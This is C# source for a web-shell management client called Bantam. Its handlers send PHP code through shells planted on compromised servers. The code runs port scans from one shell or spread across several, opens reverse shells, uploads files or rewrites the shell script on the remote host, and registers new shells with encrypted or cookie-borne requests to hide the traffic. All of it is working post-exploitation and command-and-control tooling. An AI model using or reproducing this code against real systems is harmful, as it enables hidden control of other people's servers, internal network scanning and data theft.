/// <summary> /// Main port scan routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnScan_Click(object sender, EventArgs e) { if (btnScan.Enabled == false) { return; } string target = textBoxHost.Text; if (string.IsNullOrEmpty(target) && !Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)) { labelDynStatus.Text = "Invalid IP/Url."; return; } btnScan.Enabled = false; if (BantamMain.Shells.ContainsKey(ShellUrl)) { string portsCode = string.Empty; bool encryptResponse = BantamMain.Shells[ShellUrl].ResponseEncryption; int ResponseEncryptionMode = BantamMain.Shells[ShellUrl].ResponseEncryptionMode; if (int.TryParse(textBoxPorts.Text, out int outVal)) { if (!string.IsNullOrEmpty(textBoxPorts.Text)) { portsCode = "$ports = array('" + textBoxPorts.Text + "');"; labelDynStatus.Text = ""; } else { if (comboBoxCommonPorts.SelectedIndex != 0) { if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ONE_TO_1024) { portsCode = PhpBuilder.PortsScannerPorts1To1024(); labelDynStatus.Text = "** May fail unless on local IP"; } else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.COMMON_PORTS) { labelDynStatus.Text = "** May fail unless on local IP"; portsCode = PhpBuilder.PortScannerPortsCommon(); } else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ALL_PORTS) { portsCode = PhpBuilder.PortScannerPortsAll(); labelDynStatus.Text = "** May fail unless on local IP"; } } } string phpCode = PhpBuilder.PortScanner(textBoxHost.Text, portsCode, encryptResponse); BantamMain.ExecutePHPCodeDisplayInRichTextBox(ShellUrl, phpCode, "Opened Ports - " + textBoxHost.Text, encryptResponse, ResponseEncryptionMode); } } btnScan.Enabled = true; }
/// <summary> /// Task wrapper for popping reverse shell without chankro /// </summary> /// <param name="shellCode"></param> private async Task PopReverseShell(string shellCode) { string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false); await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false)); if (checkBoxLogShellCode.Checked) { LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED); } }
/// <summary> /// Main upload routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnUpload_Click(object sender, EventArgs e) { string phpCode = string.Empty; btnBrowse.Enabled = false; btnUpload.Enabled = false; richTextBox1.Enabled = false; if (EditingSelf) { if (!string.IsNullOrEmpty(richTextBox1.Text)) { phpCode = Helper.EncodeBase64ToString(richTextBox1.Text); } else { LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO); btnUpload.Enabled = true; return; } phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode); } else { if (!string.IsNullOrEmpty(LocalFileLocation)) { phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation)); } else if (!string.IsNullOrEmpty(richTextBox1.Text)) { phpCode = Helper.EncodeBase64ToString(richTextBox1.Text); } else { LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO); btnUpload.Enabled = true; return; } string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text; phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode); } await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode); btnUpload.Enabled = true; btnBrowse.Enabled = true; richTextBox1.Enabled = true; this.Close(); }
/// <summary> /// Main Distributed scanning routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnScan_Click(object sender, EventArgs e) { if (string.IsNullOrEmpty(textBoxTarget.Text)) { lblStatus.Text = "Invalid IP/Url."; return; } string target = textBoxTarget.Text; if (!Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)) { lblStatus.Text = "Invalid IP/Url."; return; } if (string.IsNullOrEmpty(textBoxStartPort.Text) || string.IsNullOrEmpty(textBoxEndPort.Text)) { lblStatus.Text = "Invalid port."; return; } int startPort = Convert.ToInt32(textBoxStartPort.Text); int endPort = Convert.ToInt32(textBoxEndPort.Text); if (startPort > endPort || endPort <= 0 || startPort <= 0 || startPort > PORT_MAX || endPort > PORT_MAX) { lblStatus.Text = "Invalid port."; return; } btnScan.Enabled = false; string windowTitle = "Open Ports ( " + target + " )"; RichTextBox rtb = GuiHelper.RichTextBoxDialog(windowTitle, string.Empty); int shellsCount = checkedListBoxShells.CheckedItems.Count; int portsPerShell = ((endPort - startPort) / shellsCount); int iter = 1; foreach (var checkedItem in checkedListBoxShells.CheckedItems) { string portsCode = string.Empty; string scannedRange = string.Empty; if (iter == shellsCount) { if (iter == 1) { scannedRange = startPort.ToString() + ", " + (endPort).ToString(); portsCode = "$ports = range(" + scannedRange + ");"; } else { scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (endPort).ToString(); portsCode = "$ports = range(" + scannedRange + ");"; } } else { if (iter == 1) { scannedRange = startPort.ToString() + ", " + (iter * portsPerShell).ToString(); portsCode = "$ports = range(" + scannedRange + ");"; } else { scannedRange = (((iter - 1) * portsPerShell) + 1).ToString() + ", " + (iter * portsPerShell).ToString(); portsCode = "$ports = range(" + scannedRange + ");"; } iter++; } bool encryptResponse = true; string shellUrl = checkedListBoxShells.GetItemText(checkedItem); string responseText = "[" + shellUrl + "] - returned ports (" + scannedRange + ") - \r\n"; string phpCode = PhpBuilder.PortScanner(target, portsCode, encryptResponse); lblStatus.Text = "Scanning."; BantamMain.ExecutePHPCodeDisplayInRichTextBox(shellUrl, phpCode, windowTitle, encryptResponse, (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL, false, rtb, responseText); btnScan.Enabled = true; } }
/// <summary> /// Main add shell/host To GUI routine /// </summary> /// <param name="sender"></param> /// <param name="e"></param> private async void btnAddShell_Click(object sender, EventArgs e) { string shellURL = txtBoxShellUrl.Text; if (string.IsNullOrEmpty(shellURL)) { return; } if (checkBoxEncryptRequest.Checked) { string encryptionKey = textBoxEncrpytionKey.Text; if (encryptionKey.Length != 32) { labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again."; return; } if (!checkBoxSendIVInRequest.Checked) { string encryptionIV = textBoxEncrpytionIV.Text; if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16) { labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again."; return; } } } //Remove Shell if (BantamMain.Shells.ContainsKey(shellURL)) { BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL); if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut)) { LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } } //Add Shell if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo())) { LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR); return; } BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text; if (comboBoxVarType.Text == "cookie") { BantamMain.Shells[shellURL].SendDataViaCookie = true; } if (checkBoxResponseEncryption.Checked == false) { BantamMain.Shells[shellURL].ResponseEncryption = false; } else { BantamMain.Shells[shellURL].ResponseEncryption = true; BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex; } if (checkBoxGZipRequest.Checked) { BantamMain.Shells[shellURL].GzipRequestData = true; } else { BantamMain.Shells[shellURL].GzipRequestData = false; } bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption; int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode; if (checkBoxEncryptRequest.Checked) { BantamMain.Shells[shellURL].RequestEncryption = true; BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text; if (checkBoxSendIVInRequest.Checked) { BantamMain.Shells[shellURL].SendRequestEncryptionIV = true; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text; } else { BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; } } else { BantamMain.Shells[shellURL].RequestEncryption = false; BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty; BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty; } string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse); ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode); if (string.IsNullOrEmpty(response.Result)) { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } string result = response.Result; if (encryptResponse) { result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode); } if (string.IsNullOrEmpty(result) || result != "1") { labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again."; BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut); return; } BantamMain.Instance.InitializeShellData(shellURL); this.Close(); }